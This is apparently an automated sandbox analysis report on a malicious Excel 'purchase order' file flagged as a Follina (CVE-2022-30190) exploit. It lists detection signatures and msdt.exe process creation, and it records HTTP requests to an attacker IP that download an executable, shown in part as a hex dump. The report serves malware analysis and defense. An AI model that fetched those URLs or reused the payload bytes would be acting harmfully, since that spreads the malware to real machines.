Windows Analysis Report
purchase order.xlsx

Overview

General Information

Sample Name: purchase order.xlsx
Analysis ID: 653502
MD5: a8930c1fcd80e9965ae26446afb717f6
SHA1: 0cbf04bf7fc8522ab983f0246357fa70a85ee56b
SHA256: c02ff7b4d28a259d37a659a6951dba4ee574562ef5fc3b3a0135640c0370dee2
Tags: VelvetSweatshopxlsx
Infos:

Detection

Follina CVE-2022-30190
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: purchase order.xlsx ReversingLabs: Detection: 17%

Exploits
barindex
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Source: Yara match File source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\msdt.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.4:49773 -> 172.245.119.48:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.4:49773 -> 172.245.119.48:80
Source: excel.exe Memory has grown: Private usage: 1MB later: 67MB
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /shipping_invc/document.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /870/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Jun 2022 08:46:37 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Tue, 28 Jun 2022 02:41:13 GMTETag: "6d600-5e278f84f0321"Accept-Ranges: bytesContent-Length: 448000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 4d ba 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ce 06 00 00 06 00 00 00 00 00 00 92 ec 06 00 00 20 00 00 00 00 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ec 06 00 4f 00 00 00 00 00 07 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 cc 06 00 00 20 00 00 00 ce 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 03 00 00 00 00 07 00 00 04 00 00 00 d0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 07 00 00 02 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 ec 06 00 00 00 00 00 48 00 00 00 02 00 05 00 38 62 00 00 48 3f 00 00 03 00 00 00 53 00 00 06 80 a1 00 00 c0 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 c0 00 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 28 13 00 00 0a 00 00 02 28 09 00 00 06 00 7e 02 00 00 04 74 13 00 00 01 19 8d 12 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 1f 00 00 70 a2 25 18 72 31 00 00 70 a2 28 14 00 00 0a 26 02 72 51 00 00 70 02 28 02 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 06 00 00 04 02 28 05 00 00 06 6f 16 00 00 0a 00 02 7b 07 00 00 04 72 65 00 00 70 02 28 03 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 08 00 00 04 02 28 06 00 00 06 6f 16 00 00 0a 00 02 7b 09 00 00 04 02 28 07 00 00 06 6f 16 00 00 0a 00 02 7b 0a 00 00 04 02 28 04 00 00 06 6f 16 00 00 0a 00 2a 13 30 03 00 60 00 00 00 01 00 00 11 00 28 17 00 00 0a d0 05 00 00 01 28 18 00 00 0a 16 6f 19 00 00 0a 0a 06 8e 16 fe 03 0b 07 2c 2a 00 06 16 9a 74 05 00 00 01 0c 08 6f 1a 00 00 0a 72 7d 00 00 70 28 1b 00 00 0a 0d 09 2c 0b 00 08 6f 1a 00 00 0a 13 04 2b 14 00 28 17 00 00 0a 6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.48
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.aadrm.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.cortana.ai
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.office.net
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.onedrive.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://augloop.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://cdn.entity.
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://cortana.ai
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://cortana.ai/api
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://cr.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://directory.services.
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://graph.windows.net
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://graph.windows.net/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://invites.office.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://login.windows.local
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://management.azure.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://management.azure.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://messaging.action.office.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://messaging.office.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
